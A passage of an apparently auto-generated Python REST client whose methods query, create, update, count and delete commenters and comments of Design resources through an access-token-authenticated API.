    for name, value in kwargs.items():
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_commenters_fk_put" % name
            )
        params[name] = value
    # Both path parameters are mandatory.
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_fk_put`")
    if params['fk'] is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_fk_put`")

    # Content negotiation: omit Accept entirely when nothing is selected.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/commenters/{fk}'.replace('{format}', 'json'), 'PUT',
        {'id': params['id'], 'fk': params['fk']},
        {},
        header_params,
        body=params.get('data'),
        post_params=[],
        files={},
        response_type='TeamMember',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_commenters_get(self, id, **kwargs):
    """
    Queries commenters of Design.

    Runs synchronously and returns the response payload. Pass a
    `callback` callable (invoked with the response) to run the request
    asynchronously; the request thread is then returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str filter:
    :return: list[TeamMember]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the detailed variant, requesting only the payload;
    # a supplied callback makes it return the request thread instead.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_commenters_get_with_http_info(id, **kwargs)
def designs_id_commenters_get_with_http_info(self, id, **kwargs):
    """
    Queries commenters of Design.

    Synchronous by default; supply a `callback` callable via kwargs to
    make the request asynchronously, in which case the request thread
    is returned and the callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str filter:
    :return: list[TeamMember]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Collect recognised arguments, rejecting anything unexpected.
    allowed = ['id', 'filter', 'callback', '_return_http_data_only']
    params = {'id': id}
    for name, value in kwargs.items():
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_commenters_get" % name
            )
        params[name] = value
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_get`")

    # Only forward the optional filter when the caller supplied it.
    query_params = {}
    if 'filter' in params:
        query_params['filter'] = params['filter']

    # Content negotiation: omit Accept entirely when nothing is selected.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/commenters'.replace('{format}', 'json'), 'GET',
        {'id': params['id']},
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[TeamMember]',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_commenters_post(self, id, **kwargs):
    """
    Creates a new instance in commenters of this model.

    Runs synchronously and returns the response payload. Pass a
    `callback` callable (invoked with the response) to run the request
    asynchronously; the request thread is then returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param TeamMember data:
    :return: TeamMember
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the detailed variant, requesting only the payload;
    # a supplied callback makes it return the request thread instead.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_commenters_post_with_http_info(id, **kwargs)
def designs_id_commenters_post_with_http_info(self, id, **kwargs):
    """
    Creates a new instance in commenters of this model.

    Synchronous by default; supply a `callback` callable via kwargs to
    make the request asynchronously, in which case the request thread
    is returned and the callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param TeamMember data:
    :return: TeamMember
             If the method is called asynchronously,
             returns the request thread.
    """
    # Collect recognised arguments, rejecting anything unexpected.
    allowed = ['id', 'data', 'callback', '_return_http_data_only']
    params = {'id': id}
    for name, value in kwargs.items():
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_commenters_post" % name
            )
        params[name] = value
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_post`")

    # Content negotiation: omit Accept entirely when nothing is selected.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/commenters'.replace('{format}', 'json'), 'POST',
        {'id': params['id']},
        {},
        header_params,
        body=params.get('data'),
        post_params=[],
        files={},
        response_type='TeamMember',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_commenters_rel_fk_delete(self, id, fk, **kwargs):
    """
    Remove the commenters relation to an item by id.

    Runs synchronously and returns the response payload. Pass a
    `callback` callable (invoked with the response) to run the request
    asynchronously; the request thread is then returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the detailed variant, requesting only the payload;
    # a supplied callback makes it return the request thread instead.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_commenters_rel_fk_delete_with_http_info(id, fk, **kwargs)
def designs_id_commenters_rel_fk_delete_with_http_info(self, id, fk, **kwargs):
    """
    Remove the commenters relation to an item by id.

    Synchronous by default; supply a `callback` callable via kwargs to
    make the request asynchronously, in which case the request thread
    is returned and the callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Collect recognised arguments, rejecting anything unexpected.
    allowed = ['id', 'fk', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_commenters_rel_fk_delete" % name
            )
        params[name] = value
    # Both path parameters are mandatory.
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_rel_fk_delete`")
    if params['fk'] is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_rel_fk_delete`")

    # Content negotiation: omit Accept entirely when nothing is selected.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/commenters/rel/{fk}'.replace('{format}', 'json'), 'DELETE',
        {'id': params['id'], 'fk': params['fk']},
        {},
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type=None,
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_commenters_rel_fk_head(self, id, fk, **kwargs):
    """
    Check the existence of commenters relation to an item by id.

    Runs synchronously and returns the response payload. Pass a
    `callback` callable (invoked with the response) to run the request
    asynchronously; the request thread is then returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :return: bool
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the detailed variant, requesting only the payload;
    # a supplied callback makes it return the request thread instead.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_commenters_rel_fk_head_with_http_info(id, fk, **kwargs)
def designs_id_commenters_rel_fk_head_with_http_info(self, id, fk, **kwargs):
    """
    Check the existence of commenters relation to an item by id.

    Synchronous by default; supply a `callback` callable via kwargs to
    make the request asynchronously, in which case the request thread
    is returned and the callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :return: bool
             If the method is called asynchronously,
             returns the request thread.
    """
    # Collect recognised arguments, rejecting anything unexpected.
    allowed = ['id', 'fk', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_commenters_rel_fk_head" % name
            )
        params[name] = value
    # Both path parameters are mandatory.
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_rel_fk_head`")
    if params['fk'] is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_rel_fk_head`")

    # Content negotiation: omit Accept entirely when nothing is selected.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/commenters/rel/{fk}'.replace('{format}', 'json'), 'HEAD',
        {'id': params['id'], 'fk': params['fk']},
        {},
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='bool',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_commenters_rel_fk_put(self, id, fk, **kwargs):
    """
    Add a related item by id for commenters.

    Runs synchronously and returns the response payload. Pass a
    `callback` callable (invoked with the response) to run the request
    asynchronously; the request thread is then returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :param DesignComment data:
    :return: DesignComment
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the detailed variant, requesting only the payload;
    # a supplied callback makes it return the request thread instead.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_commenters_rel_fk_put_with_http_info(id, fk, **kwargs)
def designs_id_commenters_rel_fk_put_with_http_info(self, id, fk, **kwargs):
    """
    Add a related item by id for commenters.

    Synchronous by default; supply a `callback` callable via kwargs to
    make the request asynchronously, in which case the request thread
    is returned and the callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :param DesignComment data:
    :return: DesignComment
             If the method is called asynchronously,
             returns the request thread.
    """
    # Collect recognised arguments, rejecting anything unexpected.
    allowed = ['id', 'fk', 'data', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_commenters_rel_fk_put" % name
            )
        params[name] = value
    # Both path parameters are mandatory.
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_rel_fk_put`")
    if params['fk'] is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_rel_fk_put`")

    # Content negotiation: omit Accept entirely when nothing is selected.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/commenters/rel/{fk}'.replace('{format}', 'json'), 'PUT',
        {'id': params['id'], 'fk': params['fk']},
        {},
        header_params,
        body=params.get('data'),
        post_params=[],
        files={},
        response_type='DesignComment',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_comments_count_get(self, id, **kwargs):
    """
    Counts comments of Design.

    Runs synchronously and returns the response payload. Pass a
    `callback` callable (invoked with the response) to run the request
    asynchronously; the request thread is then returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the detailed variant, requesting only the payload;
    # a supplied callback makes it return the request thread instead.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_comments_count_get_with_http_info(id, **kwargs)
def designs_id_comments_count_get_with_http_info(self, id, **kwargs):
    """
    Counts comments of Design.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_count_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
    """
    # Reject keyword arguments this endpoint does not understand.
    all_params = ['id', 'where', 'callback', '_return_http_data_only']
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_count_get" % key
            )
        params[key] = val
    del params['kwargs']

    # 'id' is mandatory for this call.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_count_get`")

    collection_formats = {}
    resource_path = '/Designs/{id}/comments/count'.replace('{format}', 'json')

    path_params = {k: params[k] for k in ('id',) if k in params}
    query_params = {k: params[k] for k in ('where',) if k in params}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate `Accept`; leave the header out when nothing was selected.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # Negotiate `Content-Type`.
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # This endpoint authenticates with the access token.
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='InlineResponse2001',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_delete(self, id, **kwargs):
    """
    Deletes all comments of this model.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_delete(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :return: None
    """
    # Unwrap the HTTP response in both modes; the delegate returns the
    # data synchronously or the request thread when a callback is set.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_comments_delete_with_http_info(id, **kwargs)
def designs_id_comments_delete_with_http_info(self, id, **kwargs):
    """
    Deletes all comments of this model.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_delete_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :return: None
    """
    # Reject keyword arguments this endpoint does not understand.
    all_params = ['id', 'callback', '_return_http_data_only']
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_delete" % key
            )
        params[key] = val
    del params['kwargs']

    # 'id' is mandatory for this call.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_delete`")

    collection_formats = {}
    resource_path = '/Designs/{id}/comments'.replace('{format}', 'json')

    path_params = {k: params[k] for k in ('id',) if k in params}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate `Accept`; leave the header out when nothing was selected.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # Negotiate `Content-Type`.
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # This endpoint authenticates with the access token.
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_fk_delete(self, id, fk, **kwargs):
    """
    Delete a related item by id for comments.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_fk_delete(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for comments (required)
    :return: None
    """
    # Unwrap the HTTP response in both modes; the delegate returns the
    # data synchronously or the request thread when a callback is set.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_comments_fk_delete_with_http_info(id, fk, **kwargs)
def designs_id_comments_fk_delete_with_http_info(self, id, fk, **kwargs):
    """
    Delete a related item by id for comments.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_fk_delete_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for comments (required)
    :return: None
    """
    # Reject keyword arguments this endpoint does not understand.
    all_params = ['id', 'fk', 'callback', '_return_http_data_only']
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_fk_delete" % key
            )
        params[key] = val
    del params['kwargs']

    # Both path parameters are mandatory for this call.
    for required in ('id', 'fk'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `designs_id_comments_fk_delete`" % required)

    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{fk}'.replace('{format}', 'json')

    path_params = {k: params[k] for k in ('id', 'fk') if k in params}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate `Accept`; leave the header out when nothing was selected.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # Negotiate `Content-Type`.
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # This endpoint authenticates with the access token.
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_fk_get(self, id, fk, **kwargs):
    """
    Find a related item by id for comments.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_fk_get(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for comments (required)
    :return: DesignComment
    """
    # Unwrap the HTTP response in both modes; the delegate returns the
    # data synchronously or the request thread when a callback is set.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_comments_fk_get_with_http_info(id, fk, **kwargs)
def designs_id_comments_fk_get_with_http_info(self, id, fk, **kwargs):
    """
    Find a related item by id for comments.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_fk_get_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for comments (required)
    :return: DesignComment
    """
    # Reject keyword arguments this endpoint does not understand.
    all_params = ['id', 'fk', 'callback', '_return_http_data_only']
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_fk_get" % key
            )
        params[key] = val
    del params['kwargs']

    # Both path parameters are mandatory for this call.
    for required in ('id', 'fk'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `designs_id_comments_fk_get`" % required)

    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{fk}'.replace('{format}', 'json')

    path_params = {k: params[k] for k in ('id', 'fk') if k in params}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate `Accept`; leave the header out when nothing was selected.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # Negotiate `Content-Type`.
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # This endpoint authenticates with the access token.
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignComment',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_fk_put(self, id, fk, **kwargs):
    """
    Update a related item by id for comments.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_fk_put(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for comments (required)
    :param DesignComment data:
    :return: DesignComment
    """
    # Unwrap the HTTP response in both modes; the delegate returns the
    # data synchronously or the request thread when a callback is set.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_comments_fk_put_with_http_info(id, fk, **kwargs)
def designs_id_comments_fk_put_with_http_info(self, id, fk, **kwargs):
    """
    Update a related item by id for comments.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_fk_put_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for comments (required)
    :param DesignComment data:
    :return: DesignComment
    """
    # Reject keyword arguments this endpoint does not understand.
    all_params = ['id', 'fk', 'data', 'callback', '_return_http_data_only']
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_fk_put" % key
            )
        params[key] = val
    del params['kwargs']

    # Both path parameters are mandatory for this call.
    for required in ('id', 'fk'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `designs_id_comments_fk_put`" % required)

    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{fk}'.replace('{format}', 'json')

    path_params = {k: params[k] for k in ('id', 'fk') if k in params}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # Optional request body; None when the caller did not pass `data`.
    body_params = params.get('data')

    # Negotiate `Accept`; leave the header out when nothing was selected.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # Negotiate `Content-Type`.
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # This endpoint authenticates with the access token.
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignComment',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_get(self, id, **kwargs):
    """
    Queries comments of Design.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str filter:
    :return: list[DesignComment]
    """
    # Unwrap the HTTP response in both modes; the delegate returns the
    # data synchronously or the request thread when a callback is set.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_comments_get_with_http_info(id, **kwargs)
def designs_id_comments_get_with_http_info(self, id, **kwargs):
    """
    Queries comments of Design.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str filter:
    :return: list[DesignComment]
    """
    # Reject keyword arguments this endpoint does not understand.
    all_params = ['id', 'filter', 'callback', '_return_http_data_only']
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_get" % key
            )
        params[key] = val
    del params['kwargs']

    # 'id' is mandatory for this call.
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_comments_get`")

    collection_formats = {}
    resource_path = '/Designs/{id}/comments'.replace('{format}', 'json')

    path_params = {k: params[k] for k in ('id',) if k in params}
    query_params = {k: params[k] for k in ('filter',) if k in params}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate `Accept`; leave the header out when nothing was selected.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # Negotiate `Content-Type`.
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # This endpoint authenticates with the access token.
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[DesignComment]',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_comments_nk_commenter_get(self, id, nk, **kwargs):
    """
    Fetches belongsTo relation commenter.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_commenter_get(id, nk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param bool refresh:
    :return: TeamMember
    """
    # Unwrap the HTTP response in both modes; the delegate returns the
    # data synchronously or the request thread when a callback is set.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_comments_nk_commenter_get_with_http_info(id, nk, **kwargs)
def designs_id_comments_nk_commenter_get_with_http_info(self, id, nk, **kwargs):
    """
    Fetches belongsTo relation commenter.

    Synchronous by default; supply a `callback` function to perform the
    request asynchronously, in which case the request thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_comments_nk_commenter_get_with_http_info(id, nk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str nk: Foreign key for comments. (required)
    :param bool refresh:
    :return: TeamMember
    """
    # Reject keyword arguments this endpoint does not understand.
    all_params = ['id', 'nk', 'refresh', 'callback', '_return_http_data_only']
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_comments_nk_commenter_get" % key
            )
        params[key] = val
    del params['kwargs']

    # Both path parameters are mandatory for this call.
    for required in ('id', 'nk'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling `designs_id_comments_nk_commenter_get`" % required)

    collection_formats = {}
    resource_path = '/Designs/{id}/comments/{nk}/commenter'.replace('{format}', 'json')

    path_params = {k: params[k] for k in ('id', 'nk') if k in params}
    query_params = {k: params[k] for k in ('refresh',) if k in params}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate `Accept`; leave the header out when nothing was selected.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # Negotiate `Content-Type`.
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # This endpoint authenticates with the access token.
